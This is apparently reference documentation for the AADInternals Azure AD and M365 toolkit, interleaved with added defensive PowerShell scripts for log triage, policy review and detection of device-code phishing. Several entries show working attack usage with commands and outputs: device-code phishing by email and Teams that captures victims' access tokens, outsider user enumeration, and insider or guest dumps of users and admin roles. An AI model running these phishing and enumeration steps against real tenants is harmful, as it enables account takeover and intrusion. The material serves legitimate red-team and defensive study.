HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp\fInheritReconnectSame: 1
HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp\fReconnectSame: 0
HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp\fInheritMaxSessionTime: 1
HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp\fInheritMaxDisconnectionTime: 1
HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp\MaxDisconnectionTime: 0
HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp\MaxConnectionTime: 0
HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp\fInheritMaxIdleTime: 1
HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp\MaxIdleTime: 0
HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp\MaxInstanceCount: 4294967295
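The Azure functions above can be chained into a tenant-wide inventory, which is the defender's use of them: find every Windows VM whose RDP configuration you should review. The following is an added example, not part of AADInternals; it assumes the module is imported, that the functions return objects with the property names shown in the outputs above, and that Get-AADIntAzureVMRdpSettings returns its "key: value" lines as strings.

```powershell
# Added example (not part of AADInternals): inventory the RDP settings of every Windows VM
# in every subscription the token can see, using the module's Azure functions above.

function ConvertFrom-AADIntRdpSettings {
    # Turns the "HKLM:\...\Name: value" lines returned by Get-AADIntAzureVMRdpSettings
    # into a hashtable keyed by value name (PortNumber, fDenyTSConnections, ...).
    param([Parameter(Mandatory)][AllowEmptyCollection()][string[]]$Lines)
    $settings = @{}
    foreach ($line in $Lines) {
        # Lines such as "Not domain joined" carry no registry value and are skipped
        if ($line -match '^HKLM:.*\\(?<name>[^\\:]+):\s*(?<value>.*)$') {
            $settings[$Matches.name] = $Matches.value.Trim()
        }
    }
    return $settings
}

function Get-AzureVMRdpExposure {
    # Assumption of this example: the access token was obtained with
    # Get-AADIntAccessTokenForAzureCoreManagement, as in the examples above.
    param([Parameter(Mandatory)][string]$AccessToken)

    foreach ($sub in Get-AADIntAzureSubscriptions -AccessToken $AccessToken) {
        $vms = Get-AADIntAzureVMs -AccessToken $AccessToken -SubscriptionId $sub.subscriptionId
        # RDP settings are Windows-only; Linux VMs are listed but not queried
        foreach ($vm in ($vms | Where-Object { $_.OS -eq 'Windows' })) {
            $lines = Get-AADIntAzureVMRdpSettings -AccessToken $AccessToken `
                -SubscriptionId $sub.subscriptionId -ResourceGroup $vm.resourceGroup -Server $vm.name
            $rdp = ConvertFrom-AADIntRdpSettings -Lines @($lines)
            [pscustomobject]@{
                Subscription  = $sub.displayName
                ResourceGroup = $vm.resourceGroup
                VM            = $vm.name
                AdminUser     = $vm.adminUserName
                RdpPort       = $rdp['PortNumber']
                # fDenyTSConnections unset or 0 (as in the output above) means RDP is accepted
                RdpAllowed    = ($rdp['fDenyTSConnections'] -ne '1')
                # 0 means disconnected sessions never time out
                MaxIdleTime   = $rdp['MaxIdleTime']
            }
        }
    }
}

# Usage: one row per Windows VM, RDP-enabled machines with the default port first
$at = Get-AADIntAccessTokenForAzureCoreManagement
Get-AzureVMRdpExposure -AccessToken $at |
    Sort-Object -Property RdpAllowed, RdpPort -Descending |
    Format-Table -AutoSize
```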

Get-AADIntAzureTenants (AC)

Since version 0.4.0
Lists all Azure AD tenants the user has access to.

Example:

# Get the Access Token and save to cache
Get-AADIntAccessTokenForAzureCoreManagement -SaveToCache

# List the tenants
Get-AADIntAzureTenants

Output:

Id                                   Country Name        Domains                                                                                                  
--                                   ------- ----        -------                                                                                                  
221769d7-0747-467c-a5c1-e387a232c58c FI      Firma Oy    {firma.mail.onmicrosoft.com, firma.onmicrosoft.com, firma.fi}              
6e3846ee-e8ca-4609-a3ab-f405cfbd02cd US      Company Ltd {company.onmicrosoft.com, company.mail.onmicrosoft.com,company.com}

Get-AADIntAzureInformation (AC)

Since version 0.4.0
Gets some Azure AD tenant information, including certain tenant settings and ALL domains. The access token MUST be stored in the cache! Works also for guest users!

The -Tenant parameter is not required when getting the access token, but it is recommended, as some tenants may require MFA.

Example:

# Get the Access Token and save to cache
Get-AADIntAccessTokenForAzureCoreManagement -Tenant 6e3846ee-e8ca-4609-a3ab-f405cfbd02cd -SaveToCache

# Show the information
Get-AADIntAzureInformation -Tenant 6e3846ee-e8ca-4609-a3ab-f405cfbd02cd

Output:

objectId                                  : 6e3846ee-e8ca-4609-a3ab-f405cfbd02cd
displayName                               : Company Ltd
usersCanRegisterApps                      : True
isAnyAccessPanelPreviewFeaturesAvailable  : False
showMyGroupsFeature                       : False
myGroupsFeatureValue                      : 
myGroupsGroupId                           : 
myGroupsGroupName                         : 
showMyAppsFeature                         : False
myAppsFeatureValue                        : 
myAppsGroupId                             : 
myAppsGroupName                           : 
showUserActivityReportsFeature            : False
userActivityReportsFeatureValue           : 
userActivityReportsGroupId                : 
userActivityReportsGroupName              : 
showRegisteredAuthMethodFeature           : False
registeredAuthMethodFeatureValue          : 
registeredAuthMethodGroupId               : 
registeredAuthMethodGroupName             : 
usersCanAddExternalUsers                  : False
limitedAccessCanAddExternalUsers          : False
restrictDirectoryAccess                   : False
groupsInAccessPanelEnabled                : False
selfServiceGroupManagementEnabled         : True
securityGroupsEnabled                     : False
usersCanManageSecurityGroups              : 
office365GroupsEnabled                    : False
usersCanManageOfficeGroups                : 
allUsersGroupEnabled                      : False
scopingGroupIdForManagingSecurityGroups   : 
scopingGroupIdForManagingOfficeGroups     : 
scopingGroupNameForManagingSecurityGroups : 
scopingGroupNameForManagingOfficeGroups   : 
objectIdForAllUserGroup                   : 
allowInvitations                          : False
isB2CTenant                               : False
restrictNonAdminUsers                     : False
enableLinkedInAppFamily                   : 0
toEnableLinkedInUsers                     : {}
toDisableLinkedInUsers                    : {}
linkedInSelectedGroupObjectId             : 
linkedInSelectedGroupDisplayName          : 
allowedActions                            : @{application=System.Object[]; domain=System.Object[]; group=System.Object[]; serviceprincipal=System.Object[]; 
                                            tenantdetail=System.Object[]; user=System.Object[]; serviceaction=System.Object[]}
skuInfo                                   : @{aadPremiumBasic=False; aadPremium=False; aadPremiumP2=False; aadBasic=False; aadBasicEdu=False; aadSmb=False; 
                                            enterprisePackE3=False; enterprisePremiumE5=False}
domains                                   : {@{authenticationType=Managed; availabilityStatus=; isAdminManaged=True; isDefault=False; isDefaultForCloudRedirections=False; 
                                            isInitial=False; isRoot=True; isVerified=True; name=company.com; supportedServices=System.Object[]; forceDeleteState=; state=; 
                                            passwordValidityPeriodInDays=; passwordNotificationWindowInDays=}, @{authenticationType=Managed; availabilityStatus=; 
                                            isAdminManaged=True; isDefault=False; isDefaultForCloudRedirections=False; isInitial=True; isRoot=True; isVerified=True; 
                                            name=company.onmicrosoft.com;}...}

Get-AADIntAzureSignInLog (M)

Since version 0.4.0
Returns the 50 latest entries from the Azure AD sign-in log, or a single entry by id.

Example:

# Get the Access Token and save to cache
Get-AADIntAccessTokenForMSGraph -SaveToCache

# Show the log
Get-AADIntAzureSignInLog

Output:

createdDateTime              id                                   ipAddress      userPrincipalName             appDisplayName                   
---------------              --                                   ---------      -----------------             --------------                   
2020-05-25T05:54:28.5131075Z b223590e-8ba1-4d54-be54-03071659f900 199.11.103.31  admin@company.onmicrosoft.com Azure Portal                     
2020-05-29T07:56:50.2565658Z f6151a97-98cc-444e-a79f-a80b54490b00 139.93.35.110  user@company.com              Azure Portal                     
2020-05-29T08:02:24.8788565Z ad2cfeff-52f2-442a-b8fc-1e951b480b00 11.146.246.254 user2@company.com             Microsoft Docs                   
2020-05-29T08:56:48.7857468Z e0f8e629-863f-43f5-a956-a4046a100d00 1.239.249.24   admin@company.onmicrosoft.com Azure Active Directory PowerShell

# Show the information for a single entry
Get-AADIntAzureSignInLog -EntryId b223590e-8ba1-4d54-be54-03071659f900

Output:

id                                : b223590e-8ba1-4d54-be54-03071659f900
createdDateTime                   : 2020-05-25T05:54:28.5131075Z
userDisplayName                   : admin company
userPrincipalName                 : admin@company.onmicrosoft.com
userId                            : 289fcdf8-af4e-40eb-a363-0430bc98d4d1
appId                             : c44b4083-3bb0-49c1-b47d-974e53cbdf3c
appDisplayName                    : Azure Portal
ipAddress                         : 199.11.103.31
clientAppUsed                     : Browser
userAgent                         : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
...

Get-AADIntAzureAuditLog (M)

Since version 0.4.0
Returns the 50 latest entries from the Azure AD audit log, or a single entry by id.

Example:

# Get the Access Token and save to cache
Get-AADIntAccessTokenForMSGraph -SaveToCache

# Show the log
Get-AADIntAzureAuditLog

Output:

id                                                            activityDateTime             activityDisplayName   operationType result  initiatedBy   
--                                                            ----------------             -------------------   ------------- ------  -----------   
Directory_9af6aff3-dc09-4ac1-a1d3-143e80977b3e_EZPWC_41985545 2020-05-29T07:57:51.4037921Z Add service principal Add           success @{user=; app=}
Directory_f830a9d4-e746-48dc-944c-eb093364c011_1ZJAE_22273050 2020-05-29T07:57:51.6245497Z Add service principal Add           failure @{user=; app=}
Directory_a813bc02-5d7a-4a40-9d37-7d4081d42b42_RKRRS_12877155 2020-06-02T12:49:38.5177891Z Add user              Add           success @{app=; user=}

# Show the information for a single entry
Get-AADIntAzureAuditLog -EntryId Directory_9af6aff3-dc09-4ac1-a1d3-143e80977b3e_EZPWC_41985545

Output:

id                  : Directory_9af6aff3-dc09-4ac1-a1d3-143e80977b3e_EZPWC_41985545
category            : ApplicationManagement
correlationId       : 9af6aff3-dc09-4ac1-a1d3-143e80977b3e
result              : success
resultReason        : 
activityDisplayName : Add service principal
activityDateTime    : 2020-05-29T07:57:51.4037921Z
loggedByService     : Core Directory
operationType       : Add
initiatedBy         : @{user=; app=}
targetResources     : {@{id=66ce0b00-92ee-4851-8495-7c144b77601f; displayName=Azure Credential Configuration Endpoint Service; type=ServicePrincipal; userPrincipalName=; 
                      groupType=; modifiedProperties=System.Object[]}}
additionalDetails   : {}
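The sign-in and audit log functions above return objects that can be triaged directly in the pipeline. The following is an added example, not part of AADInternals, that flags sign-ins by the Azure AD PowerShell app from IP addresses outside an allow list and successful "Add service principal" events; the property names follow the outputs above, the sample entries are constructed for this example, and the -KnownIPs parameter is an assumption of the example.

```powershell
# Added example (not part of AADInternals): triage entries returned by
# Get-AADIntAzureSignInLog and Get-AADIntAzureAuditLog. Property names follow the
# outputs above; the sample entries at the bottom are constructed, not real log data.

function Find-ToolingSignIn {
    # Flags sign-ins made with scripting/tooling apps (by default the Azure AD PowerShell app,
    # as in the sign-in output above) from IP addresses that are not on the allow list.
    param(
        [Parameter(ValueFromPipeline)]$Entry,
        [string[]]$KnownIPs = @(),                                     # assumption: your egress IPs
        [string[]]$ToolingApps = @('Azure Active Directory PowerShell')
    )
    process {
        if ($Entry.appDisplayName -in $ToolingApps -and $Entry.ipAddress -notin $KnownIPs) {
            [pscustomobject]@{
                Time   = $Entry.createdDateTime
                User   = $Entry.userPrincipalName
                App    = $Entry.appDisplayName
                IP     = $Entry.ipAddress
                Reason = 'Tooling sign-in from an IP outside the allow list'
            }
        }
    }
}

function Find-ServicePrincipalAddition {
    # Successful "Add service principal" events (seen in the audit output above) deserve review,
    # since an unexpected service principal is a common way for access to outlive a password reset.
    param([Parameter(ValueFromPipeline)]$Entry)
    process {
        if ($Entry.activityDisplayName -eq 'Add service principal' -and $Entry.result -eq 'success') {
            [pscustomobject]@{
                Time        = $Entry.activityDateTime
                Id          = $Entry.id
                InitiatedBy = $Entry.initiatedBy
                Target      = (@($Entry.targetResources) | ForEach-Object { $_.displayName }) -join ', '
            }
        }
    }
}

# Constructed sample entries mirroring the outputs above (not real log data)
$signIns = @(
    [pscustomobject]@{ createdDateTime = '2020-05-25T05:54:28Z'; userPrincipalName = 'admin@company.onmicrosoft.com'
                       ipAddress = '199.11.103.31'; appDisplayName = 'Azure Portal' }
    [pscustomobject]@{ createdDateTime = '2020-05-29T08:56:48Z'; userPrincipalName = 'admin@company.onmicrosoft.com'
                       ipAddress = '1.239.249.24'; appDisplayName = 'Azure Active Directory PowerShell' }
)
$audit = @(
    [pscustomobject]@{ id = 'Directory_9af6aff3-dc09-4ac1-a1d3-143e80977b3e_EZPWC_41985545'
                       activityDateTime = '2020-05-29T07:57:51Z'; activityDisplayName = 'Add service principal'
                       result = 'success'; initiatedBy = $null
                       targetResources = @([pscustomobject]@{ displayName = 'Azure Credential Configuration Endpoint Service' }) }
    [pscustomobject]@{ id = 'Directory_a813bc02-5d7a-4a40-9d37-7d4081d42b42_RKRRS_12877155'
                       activityDateTime = '2020-06-02T12:49:38Z'; activityDisplayName = 'Add user'
                       result = 'success'; initiatedBy = $null; targetResources = @() }
)

# Only the PowerShell sign-in from 1.239.249.24 and the service principal addition are reported
$signIns | Find-ToolingSignIn -KnownIPs '199.11.103.31' | Format-Table -AutoSize
$audit   | Find-ServicePrincipalAddition | Format-Table -AutoSize

# Live use (token saved to cache as in the examples above):
# Get-AADIntAzureSignInLog | Find-ToolingSignIn -KnownIPs $corpEgressIPs
# Get-AADIntAzureAuditLog  | Find-ServicePrincipalAddition
```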

Kill chain functions

These functions are part of AAD & M365 Kill Chain.

Invoke-AADIntReconAsOutsider

Since version 0.4.0

Starts tenant recon of the given domain. Gets all verified domains of the tenant and extracts information such as their type.

Also checks whether Desktop SSO (aka Seamless SSO) is enabled for the tenant.

Value Description
----- -----------
DNS   Does the DNS record exist?
MX    Does the MX record point to Office 365?
SPF   Does the SPF record contain Exchange Online?
Type  Federated or Managed
STS   The FQDN of the federated IdP's (Identity Provider) STS (Security Token Service) server

Example:

# Invoke tenant recon as an outsider
Invoke-AADIntReconAsOutsider -Domain company.com | Format-Table

Output:

Tenant brand:       Company Ltd
Tenant name:        company
Tenant id:          05aea22e-32f3-4c35-831b-52735704feb3
DesktopSSO enabled: False

Name                         DNS   MX    SPF   Type      STS
----                         ---   --    ---   ----      ---
company.com                  True  True  True  Federated sts.company.com
company.mail.onmicrosoft.com True  True  True  Managed
company.onmicrosoft.com      True  True  True  Managed
int.company.com              False False False Managed

Invoke-AADIntUserEnumerationAsOutsider

Since version 0.4.0

Checks whether the given user exists in Azure AD. Works only if the user's tenant has Desktop SSO (aka Seamless SSO) enabled for any domain.

Works also with external users!

Example 1:

# Invoke user enumeration as an outsider
Invoke-AADIntUserEnumerationAsOutsider -UserName "user@company.com"

Output:

UserName         Exists
--------         ------
user@company.com True

Example 2:

# Invoke user enumeration as an outsider using a text file
Get-Content .\users.txt | Invoke-AADIntUserEnumerationAsOutsider

Output:

UserName                                               Exists
--------                                               ------
user@company.com                                       True
user2@company.com                                      False
external.user_gmail.com#EXT#@company.onmicrosoft.com   True
external.user_outlook.com#EXT#@company.onmicrosoft.com False

Invoke-AADIntReconAsGuest (AC)

Since version 0.4.0

Starts recon of an Azure AD tenant. Prompts for the tenant. Retrieves information from the Azure AD tenant, such as the number of Azure AD objects and the quota, and the number of domains (both verified and unverified).

Example 1:

# Get access token and save to cache
Get-AADIntAccessTokenForAzureCoreManagement -SaveToCache

# Invoke tenant recon as guest
$results = Invoke-AADIntReconAsGuest

Output:

Tenant brand:                Company Ltd
Tenant name:                 company.onmicrosoft.com
Tenant id:                   6e3846ee-e8ca-4609-a3ab-f405cfbd02cd
Azure AD objects:            520/500000
Domains:                     6 (4 verified)
Non-admin users restricted?  True
Users can register apps?     True
Directory access restricted? False

# Show users allowed actions
$results.allowedActions

Output:

application      : {read}
domain           : {read}
group            : {read}
serviceprincipal : {read}
tenantdetail     : {read}
user             : {read, update}
serviceaction    : {consent}

Example 2:

# Get access token and save to cache
Get-AADIntAccessTokenForAzureCoreManagement -SaveToCache

# List Azure tenants the user has access to
Get-AADIntAzureTenants

Output:

Id                                   Country Name                      Domains
--                                   ------- ----                      -------
221769d7-0747-467c-a5c1-e387a232c58c FI      Firma Oy                  {firma.mail.onmicrosoft.com, firma.onmicrosoft.com, firma.fi}
6e3846ee-e8ca-4609-a3ab-f405cfbd02cd US      Company Ltd               {company.onmicrosoft.com, company.mail.onmicrosoft.com, company.com}

# Get a new access token for the specific tenant in case of MFA is required
Get-AADIntAccessTokenForAzureCoreManagement -SaveToCache -Tenant 6e3846ee-e8ca-4609-a3ab-f405cfbd02cd

# Invoke tenant recon as guest
$results = Invoke-AADIntReconAsGuest

Output:

Tenant brand:                Company Ltd
Tenant name:                 company.onmicrosoft.com
Tenant id:                   6e3846ee-e8ca-4609-a3ab-f405cfbd02cd
Azure AD objects:            520/500000
Domains:                     6 (4 verified)
Non-admin users restricted?  True
Users can register apps?     True
Directory access restricted? False

# Show users allowed actions
$results.allowedActions

Output:

application      : {read}
domain           : {read}
group            : {read}
serviceprincipal : {read}
tenantdetail     : {read}
user             : {read, update}
serviceaction    : {consent}

Invoke-AADIntUserEnumerationAsGuest (AC)

Since version 0.4.0

Crawls the target organisation for user names, groups, and roles. The starting point is the signed-in user, a given username, or a group id.

The crawl can be controlled with switches. Group members are limited to 1000 entries per group.

Switch        Description
------        -----------
Groups        Include user's groups
GroupMembers  Include members of user's groups
Roles         Include roles of user and group members. Can be very time consuming!
Manager       Include user's manager
Subordinates  Include user's subordinates (direct reports)

Parameters:

Parameter  Description
---------  -----------
UserName   User principal name (UPN) of the user to search. If not given, the user name from the access token is used and treated as a guest, i.e. converted to the external UPN form email_domain#EXT#@company.onmicrosoft.com (the "@" of the e-mail address replaced with "_").
GroupId    Id of the group. If this is given, only the members of the group are included.

Example:

# Invoke user enumeration as a guest
$results = Invoke-AADIntUserEnumerationAsGuest -UserName user@company.com

Output:

Tenant brand: Company Ltd
Tenant name:  company.onmicrosoft.com
Tenant id:    6e3846ee-e8ca-4609-a3ab-f405cfbd02cd
Logged in as: live.com#user@outlook.com
Users:        5
Groups:       2
Roles:        0
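
Whether a guest can crawl users, groups and roles, and what the "Users can register apps?" and "Directory access restricted?" findings of the guest recon mean, is decided by a handful of tenant-wide defaults. The following is an added example, not AADInternals code, that evaluates those defaults from the Microsoft Graph authorization policy (GET https://graph.microsoft.com/v1.0/policies/authorizationPolicy). It assumes the property names of that resource, the documented guestUserRoleId GUIDs, and that the recon's "Users can register apps?" corresponds to allowedToCreateApps and "Directory access restricted?" to allowedToReadOtherUsers (the setting the older Set-MsolCompanySettings -UsersPermissionToReadOtherUsersEnabled controlled). The sample policy object is constructed.

```powershell
# Added example (not AADInternals code): evaluates the tenant-wide default permissions that
# decide what a guest or a plain member can see, using the Microsoft Graph authorization policy
# (GET https://graph.microsoft.com/v1.0/policies/authorizationPolicy).
# Assumptions: property names match that resource; the GUIDs are the documented guestUserRoleId
# values; "Users can register apps?" maps to allowedToCreateApps and "Directory access
# restricted?" to allowedToReadOtherUsers. The sample policy below is constructed.

$RestrictedGuestRole = '2af84b1e-32c8-42b7-82bc-daa82404023b'
$GuestRoleNames = @{
    'a0b1b346-4d3e-4e8b-98f8-753987be4970' = 'Same as member users'
    '10dae51f-2a86-4a9d-a1c3-9a5d2c5bea3d' = 'Limited access (default)'
    '2af84b1e-32c8-42b7-82bc-daa82404023b' = 'Restricted access'
}

function New-Finding {
    param([string]$Setting, $Value, [string]$Recommended, [string]$Risk)
    [PSCustomObject]@{ Setting = $Setting; Value = $Value; Recommended = $Recommended; Risk = $Risk }
}

function Test-AuthorizationPolicy {
    param([Parameter(Mandatory)]$Policy)   # object parsed from the authorizationPolicy JSON
    $perms = $Policy.defaultUserRolePermissions
    if ($perms.allowedToCreateApps) {
        New-Finding 'defaultUserRolePermissions.allowedToCreateApps' $true 'false' `
            'Any member can register an app, the starting point for illicit-consent attacks'
    }
    if ($perms.allowedToReadOtherUsers) {
        New-Finding 'defaultUserRolePermissions.allowedToReadOtherUsers' $true 'false (breaks people pickers, test first)' `
            'Any member can enumerate every user and group, which insider enumeration relies on'
    }
    if ($Policy.guestUserRoleId -ne $RestrictedGuestRole) {
        $name = $GuestRoleNames[$Policy.guestUserRoleId]
        New-Finding 'guestUserRoleId' "$($Policy.guestUserRoleId) ($name)" "$RestrictedGuestRole (Restricted access)" `
            'Guests can read users and groups, which the guest crawl depends on'
    }
    if ($Policy.allowInvitesFrom -eq 'everyone') {
        New-Finding 'allowInvitesFrom' 'everyone' 'adminsAndGuestInviters' `
            'Any user, guests included, can invite further guests into the tenant'
    }
}

# Live version: needs a Graph token with Policy.Read.All
function Get-AuthorizationPolicyFindings {
    param([Parameter(Mandatory)][string]$AccessToken)
    $policy = Invoke-RestMethod -Uri 'https://graph.microsoft.com/v1.0/policies/authorizationPolicy' `
        -Headers @{ Authorization = "Bearer $AccessToken" }
    Test-AuthorizationPolicy -Policy $policy
}

# Constructed sample matching the recon output above: apps registrable, directory readable,
# guests on the default role
$samplePolicy = [PSCustomObject]@{
    allowInvitesFrom = 'everyone'
    guestUserRoleId  = '10dae51f-2a86-4a9d-a1c3-9a5d2c5bea3d'
    defaultUserRolePermissions = [PSCustomObject]@{
        allowedToCreateApps = $true; allowedToCreateSecurityGroups = $true; allowedToReadOtherUsers = $true
    }
}
Test-AuthorizationPolicy -Policy $samplePolicy | Format-Table Setting, Recommended, Risk -Wrap

# Remediation is a PATCH on the same resource (Policy.ReadWrite.Authorization), e.g.:
# { "defaultUserRolePermissions": { "allowedToCreateApps": false },
#   "guestUserRoleId": "2af84b1e-32c8-42b7-82bc-daa82404023b",
#   "allowInvitesFrom": "adminsAndGuestInviters" }
```

Restricting guests to the "Restricted access" role stops the directory-wide crawl but not the parts a guest is a member of (the groups it belongs to, its own manager), so membership hygiene for guests still matters.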


Invoke-AADIntReconAsInsider (AC)

Since version 0.4.0

Starts tenant recon of an Azure AD tenant as a normal (non-guest) user. In addition to what the guest recon returns, reports whether directory synchronisation is enabled, the number of Global Admins, and the members of the admin roles.

Example 1:

# Get access token and save to cache
Get-AADIntAccessTokenForAzureCoreManagement -SaveToCache

# Invoke tenant recon as insider
$results = Invoke-AADIntReconAsInsider

Output:

Tenant brand:                Company Ltd
Tenant name:                 company.onmicrosoft.com
Tenant id:                   6e3846ee-e8ca-4609-a3ab-f405cfbd02cd
Azure AD objects:            520/500000
Domains:                     6 (4 verified)
Non-admin users restricted?  True
Users can register apps?     True
Directory access restricted? False
Directory sync enabled?      true
Global admins                3

# List all admin roles that have members
$results.roleInformation | Where Members -ne $null | select Name,Members

Output:

Name                               Members                                                                                       
----                               -------                                                                                       
Company Administrator              {@{DisplayName=MOD Administrator; UserPrincipalName=admin@company.onmicrosoft.com}, @{D...
User Account Administrator         @{DisplayName=User Admin; UserPrincipalName=useradmin@company.com}                   
Directory Readers                  {@{DisplayName=Microsoft.Azure.SyncFabric; UserPrincipalName=}, @{DisplayName=MicrosoftAzur...
Directory Synchronization Accounts {@{DisplayName=On-Premises Directory Synchronization Service Account; UserPrincipalName=Syn...

Invoke-AADIntUserEnumerationAsInsider (AC)

Since version 0.4.0

Dumps user names and groups of the tenant.

By default, the first 1000 users and groups are returned.

Switch        Description
------        -----------
Groups        Include groups
GroupMembers  Include members of the groups (not recommended)

Parameters:

Parameter  Description
---------  -----------
GroupId    Id of the group. If this is given, only that one group and its members are included.

Example:

# Invoke user enumeration as an insider
$results = Invoke-AADIntUserEnumerationAsInsider

Output:

Users:        5542
Groups:        212

# List the first user's information
$results.Users[0]

Output:

id                              : 7ab0eb51-b7cb-4ff0-84ec-893a413d7b4a
displayName                     : User Demo
userPrincipalName               : User@company.com
onPremisesImmutableId           : UQ989+t6fEq9/0ogYtt1pA==
onPremisesLastSyncDateTime      : 2020-07-14T08:18:47Z
onPremisesSamAccountName        : UserD
onPremisesSecurityIdentifier    : S-1-5-21-854168551-3279074086-2022502410-1104
refreshTokensValidFromDateTime  : 2019-07-14T08:21:35Z
signInSessionsValidFromDateTime : 2019-07-14T08:21:35Z
proxyAddresses                  : {smtp:User@company.onmicrosoft.com, SMTP:User@company.com}
businessPhones                  : {+1234567890}
identities                      : {@{signInType=userPrincipalName; issuer=company.onmicrosoft.com; issuerAssignedId=User@company.com}} 

Invoke-AADIntPhishing

Since version 0.4.4

Sends a phishing mail to the given recipients and receives the user's access token using the device code authentication flow.

The message is sent as HTML. String formatting is used to insert the sign-in URL and the user code:

Placeholder  Value
-----------  -----
{0}          user code
{1}          sign-in URL

Default message:

'<div>Hi!<br/>This is a message sent to you by someone who is using <a href="https://o365blog.com/aadinternals">AADInternals</a> phishing function. <br/><br/>Here is a <a href="{1}">link</a> you <b>should not click</b>.<br/><br/>If you still decide to do so, provide the following code when requested: <b>{0}</b>.</div>'

Email:
[Screenshot: the default phishing message as received in Outlook]

Teams:
[Screenshot: the default phishing message as received in Teams]

Example 1:

# Send a phishing email to a recipient using the default message
$tokens = Invoke-AADIntPhishing -Recipients "wvictim@company.com" -Subject "Johnny shared a document with you" -Sender "Johnny Carson <jc@somewhere.com>" -SMTPServer smtp.myserver.local

Output:

Code: CKDZ2BURF
Mail sent to: wvictim@company.com
...
Received access token for william.victim@company.com

Example 2:

# Get access token for Teams
Get-AADIntAccessTokenForTeams -SaveToCache

# Send a Teams message to a recipient using the default message
$tokens = Invoke-AADIntPhishing -Recipients "wvictim@company.com" -Teams

Output:

Code: CKDZ2BURF
Teams message sent to: wvictim@company.com. Message id: 132473151989090816
...
Received access token for william.victim@company.com

Example 3:

# Send a phishing email to recipients using a customised message and save the tokens to cache
Invoke-AADIntPhishing -Recipients "wvictim@company.com","wvictim2@company.com" -Subject "Johnny shared a document with you" -Sender "Johnny Carson <jc@somewhere.com>" -SMTPServer smtp.myserver.local -Message '<html>Hi!<br>Here is the link to the <a href="{1}">document</a>. Use the following code to access: <b>{0}</b>.</html>' -SaveToCache

Output:

Code: CKDZ2BURF
Mail sent to: wvictim@company.com
Mail sent to: wvictim2@company.com
...
Received access token for william.victim@company.com

# Invoke the recon as an insider using the cached token of the phished user
$results = Invoke-AADIntReconAsInsider

Output:

Tenant brand:                company.com
Tenant name:                 company.onmicrosoft.com
Tenant id:                   d4e225d6-8877-4bc6-b68c-52c44011ba81
Azure AD objects:            147960/300000
Domains:                     5 (5 verified)
Non-admin users restricted?  True
Users can register apps?     True
Directory access restricted? False
Directory sync enabled?      true
Global admins                10
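
From the defender's side, the device code flow leaves a distinct trace: the sign-in record carries authenticationProtocol = "deviceCode", and in most organisations that protocol is rare. The following is an added example, not AADInternals code, that runs such a detection over sign-in records. It filters successful device code sign-ins and then correlates each with later sign-ins of the same user from a different IP, because in a phish like the one above the victim authenticates from their own address while the attacker's client receives the token and redeems it elsewhere. Field names follow the Microsoft Graph signIn resource; the log lines, the client names and the time window are constructed or assumed.

```powershell
# Added example (not AADInternals code): detection for device code phishing.
# Sign-in records carry authenticationProtocol = "deviceCode" for this flow. The first filter
# keeps successful device code sign-ins; the second step looks for later sign-ins of the same
# user from a different IP, i.e. the token being redeemed somewhere other than where the
# victim authenticated. Field names follow the Graph signIn resource; log lines are constructed.

$sampleLog = @'
{"createdDateTime":"2020-07-14T09:01:12Z","userPrincipalName":"william.victim@company.com","ipAddress":"203.0.113.10","authenticationProtocol":"deviceCode","appDisplayName":"Microsoft Office","isInteractive":true,"status":{"errorCode":0}}
{"createdDateTime":"2020-07-14T09:02:30Z","userPrincipalName":"william.victim@company.com","ipAddress":"198.51.100.77","authenticationProtocol":"oAuth2","appDisplayName":"Microsoft Office","isInteractive":false,"status":{"errorCode":0}}
{"createdDateTime":"2020-07-14T09:07:03Z","userPrincipalName":"admin@company.onmicrosoft.com","ipAddress":"198.51.100.7","authenticationProtocol":"deviceCode","appDisplayName":"Azure CLI","isInteractive":true,"status":{"errorCode":0}}
{"createdDateTime":"2020-07-14T09:09:55Z","userPrincipalName":"user2@company.com","ipAddress":"203.0.113.10","authenticationProtocol":"deviceCode","appDisplayName":"Microsoft Office","isInteractive":true,"status":{"errorCode":50126}}
{"createdDateTime":"2020-07-14T09:15:41Z","userPrincipalName":"jane.doe@company.com","ipAddress":"192.0.2.5","authenticationProtocol":"deviceCode","appDisplayName":"Microsoft Office","isInteractive":true,"status":{"errorCode":0}}
'@

function Find-DeviceCodeSignIns {
    param(
        [Parameter(Mandatory)][string[]]$JsonLines,
        # Clients admins legitimately use with device code in this (assumed) environment
        [string[]]$ExpectedDeviceCodeApps = @('Azure CLI', 'Azure PowerShell'),
        [int]$WindowMinutes = 60
    )
    $records = foreach ($line in $JsonLines) {
        if (-not [string]::IsNullOrWhiteSpace($line)) { $line | ConvertFrom-Json }
    }
    $byUser = $records | Group-Object -Property userPrincipalName -AsHashTable -AsString
    foreach ($r in $records) {
        # Only a completed device code sign-in hands a token to whoever started the flow
        if ($r.authenticationProtocol -ne 'deviceCode' -or $r.status.errorCode -ne 0) { continue }
        $t0 = [datetime]$r.createdDateTime
        $otherIp = @($byUser[$r.userPrincipalName] | Where-Object {
            $_.ipAddress -ne $r.ipAddress -and
            ([datetime]$_.createdDateTime) -gt $t0 -and
            ([datetime]$_.createdDateTime) -le $t0.AddMinutes($WindowMinutes)
        })
        $severity = if ($otherIp.Count -gt 0) { 'High' }                                        # token redeemed elsewhere
                    elseif ($ExpectedDeviceCodeApps -notcontains $r.appDisplayName) { 'Medium' }  # unusual client for this flow
                    else { 'Low' }
        [PSCustomObject]@{
            Time          = $r.createdDateTime
            User          = $r.userPrincipalName
            App           = $r.appDisplayName
            SignInIP      = $r.ipAddress
            TokenUsedFrom = (@($otherIp | ForEach-Object ipAddress | Select-Object -Unique) -join ', ')
            Severity      = $severity
        }
    }
}

# Sentinel / Log Analytics form of the first filter:
#   SigninLogs | where AuthenticationProtocol == "deviceCode" and ResultType == 0
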